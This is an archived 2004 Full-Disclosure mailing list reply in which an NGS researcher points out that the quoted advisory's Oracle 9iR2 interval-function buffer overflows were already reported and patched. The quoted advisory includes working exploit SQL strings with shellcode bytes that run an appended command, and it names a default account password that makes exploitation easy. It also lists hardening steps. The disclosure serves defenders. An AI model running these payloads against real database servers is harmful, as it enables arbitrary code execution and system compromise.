Re: [Full-Disclosure] Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

From: Chris Anley (chris_at_ngssoftware.com)
Date: 02/05/04

  • Next message: Ron DuFresne: "Re: [Full-Disclosure] Interesting side effect of the new IE patch"
    To: Cesar <cesarc56@yahoo.com>
    Date: Thu, 5 Feb 2004 13:29:45 -0800 (Pacific Standard Time)
    
    

    Hey Cesar.

    These are known bugs.

    We (NGS) found and reported them last year. As you say, Oracle has
    already fixed them and released a patch. Check out

    http://www.nextgenss.com/research.html

    ...where we posted advisories on these bugs in December, along with
    another couple in from_tz and time_zone. We've historically found a lot
    of issues in Oracle, so if you want to eliminate the stuff that's already
    fixed from your list of 60+ issues it's a good place to look; the fine
    detail isn't always available in the Oracle alerts.

         -chris.

    On Thu, 5 Feb 2004, Cesar wrote:

    > Security Advisory
    >
    > Name: Oracle Database 9ir2 Interval Conversion
    > Functions Buffer Overflow.
    > System Affected : Oracle Database 9ir2, previous
    > versions could be affected too.
    > Severity : High
    > Remote exploitable : Yes
    > Author: Cesar Cerrudo.
    > Date: 02/05/04
    > Advisory Number: CC020401
    >
    >
    > Legal Notice:
    >
    > This Advisory is Copyright (c) 2003 Cesar Cerrudo.
    > You may distribute it unmodified and for free. You may
    > NOT modify it and distribute it or distribute
    > parts of it without the author's written permission.
    > You may NOT use it for commercial intentions
    > (this means include it in vulnerabilities databases,
    > vulnerabilities scanners, any paid service,
    > etc.) without the author's written permission. You are
    > free to use Oracle details for commercial intentions.
    >
    >
    > Disclaimer:
    >
    > The information in this advisory is believed to be
    > true though it may be false.
    > The opinions expressed in this advisory are my own and
    > not of any company. The usual standard
    > disclaimer applies, especially the fact that Cesar
    > Cerrudo is not liable for any damages caused
    > by direct or indirect use of the information or
    > functionality provided by this advisory.
    > Cesar Cerrudo bears no responsibility for content or
    > misuse of this advisory or any derivatives thereof.
    >
    >
    >
    > !!!!!!!!!!!ALERT!!!!!!!!!!!:
    >
    > Oracle was contacted about these vulnerabilities, but
    > their Security Response Team is one of the worst that
    > i have deal with, they don't care about security and
    > they don't even follow OISafety rules(Oracle is a
    > member).
    > Because this reason we only have told to Oracle about
    > just a couple of bugs, i think i won't contact them
    > anymore,
    > or maybe if i get a letter from Larry Ellison asking
    > for apologies...:).
    > Anyways if Oracle would spend more money on security
    > than in marketing saying that their products are
    > unbreakable
    > everything would be different. Right now Oracle
    > database server and other Oracle products are some
    > kind of backdoor.
    > These vulnerabilities are just only a bit of +60 that
    > we have identified (yes more than 60 issues and
    > most of these issues can be exploited by any low
    > privileged user to take complete control over the
    > database and probably OS, also for some of them there
    > aren't any workarounds). If you are running Oracle i
    > recomend you to start praying to not being hacked and
    > to start complaining to Oracle to improve the quality
    > of
    > their products and to release patches.
    >
    > BTW: if someone from Oracle dares to say that i'm not
    > telling the true, then probably i will release all the
    > holes
    > information to shut their mouths.
    >
    > Some workaround to protect your Oracle servers until
    > maybe next year when Oracle probably could fix their
    > buggy
    > database server:
    >
    > -Check packages permissions and remove public
    > permission, set minimal permissions
    > that fit your needs.
    > -Check Directory Objects permissions and remove public
    > permission, set minimal permissions
    > that fit your need, remove Directory Objecs if not
    > used.
    > -Restrict users to execute directly PL/SQL statements
    > over the server.
    > -Periodically audit users permissions on all database
    > objects.
    > -Lock users that aren't used.
    > -Change default passwords.
    > If you want automation, i really like AppDetective for
    > Oracle:
    > http://www.appsecinc.com/products/appdetective/oracle/
    >
    >
    > Overview:
    >
    > Oracle Database Server is one of the most used
    > database servers in the world, it was marketed
    > as being unbreakable and many people thinks that is
    > one of the most secure database server in
    > the market. Larry Ellison (Oracle CEO) says that
    > Oracle is used by NSA, CIA, russian intelligence,
    > goverments, etc.
    > (www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
    > so it must be really secure!!!
    > Oracle Database Server provides two functions that can
    > be used with PL/SQL to convert numbers
    > to date/time intervals, these functions have buffer
    > overflow vulnerebilities.
    >
    >
    >
    > Details:
    >
    > When any of these conversion funcions are called with
    > a long string as a second
    > parameter a buffer overflow occurs.
    >
    > To reproduce the overflow execute the next PL/SQL:
    >
    > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
    >
    > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
    >
    >
    >
    > This vulnerability can be exploited by any Oracle
    > Database user because access to these
    > functions can't be restricted.
    > Explotation of this vulnerability allow an attacker to
    > execute arbitrary code, also it
    > can be exploited to cause DOS (Denial of service)
    > killing Oracle server process. An attacker can
    > complete compromise the OS and database if Oracle is
    > running on Windows plataform, because Oracle must
    > run under the local System account or under an
    > administrative account. If Oracle is running on *nix
    > then only the database could be compromised because
    > Oracle runs mostly under oracle user which has
    > restricted
    > permissions.
    > Important!: Explotation of these vulnerabilities
    > becomes easy if Oracle Internet Directory has
    > been deployed, because Oracle Internet Directory
    > creates a database user called ODSCOMMON that
    > has a default password ODSCOMMON (Unbreakable???,
    > hahaha, please take a look at this
    >
    > http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
    > this password can not be changed,
    > so any attacker can use this user to connect to
    > database and exploit these vunerabilities.
    >
    >
    > Full tests on Oracle database 9ir2 under Microsoft
    > Windows 2000 Server and Linux confirm these
    > vulnerabilities,
    > versions running in other OS plataforms are believed
    > to be affected too.
    > Previous Oracle Database Server versions could be
    > affected by these vulnerabilities.
    >
    >
    >
    > Exploits:
    >
    > --these exploits should work on W2K Server and WinXp,
    > not tested on Win2003.
    > --run any command at the end of the string
    > SELECT
    > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    > ||
    >
    > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
    >
    > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
    > ARE YOU SURE? >c:\Unbreakable.txt')
    >
    > FROM DUAL;
    >
    > SELECT
    > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
    > ||
    >
    > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
    >
    > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
    > ARE YOU SURE? >c:\Unbreakable.txt')
    >
    > FROM DUAL;
    >
    >
    >
    > Vendor Fix:
    >
    > Go to Oracle Metalink site, http://metalink.oracle.com
    >
    >
    > Vendor Contact:
    >
    > Oracle was contacted and they released a fix without
    > telling me nor the public anything and without issuing
    > an alert.
    >
    >
    >
    >
    > __________________________________
    > Do you Yahoo!?
    > Yahoo! Finance: Get your refund fast by filing online.
    > http://taxes.yahoo.com/filing.html
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Ron DuFresne: "Re: [Full-Disclosure] Interesting side effect of the new IE patch"

    Relevant Pages

    • Re: What so special about PostgreSQL and other RDBMS?
      ... That's exactly the link the licence agreement for the database points to when it ... comes to what wecan expect for paying support. ... > "Oracle may provide additional releases or versions of its programs ... If the requirements are volatile I'd do a long term contract detailing what ...
      (comp.lang.php)
    • [Full-disclosure] The history of a -probably- 13 years old Oracle bug: TNS Poison
      ... tl;dr -> Patch your database ASAP with Oracle Critical Patch Update ... which is the responsible of connections establishment. ... Instances to register under the specified service name. ...
      (Full-Disclosure)
    • The history of a -probably- 13 years old Oracle bug: TNS Poison
      ... tl;dr -> Patch your database ASAP with Oracle Critical Patch Update ... which is the responsible of connections establishment. ... Instances to register under the specified service name. ...
      (Bugtraq)
    • Re: I want to add to myknowledge
      ... 7, Oracle 6, Sybase, SQL Server ... Oracle Database Administrator ... Trained installation and support personnel in basic ... Senior Oracle Database Administrator ...
      (comp.databases.oracle.server)
    • A cool DBA job wanted
      ... 7, Oracle 6, Sybase, SQL Server ... Proposed proactive database monitoring through ... strategies to administer remote Oracle databases ... Trained installation and support personnel in basic ...
      (comp.databases.oracle.server)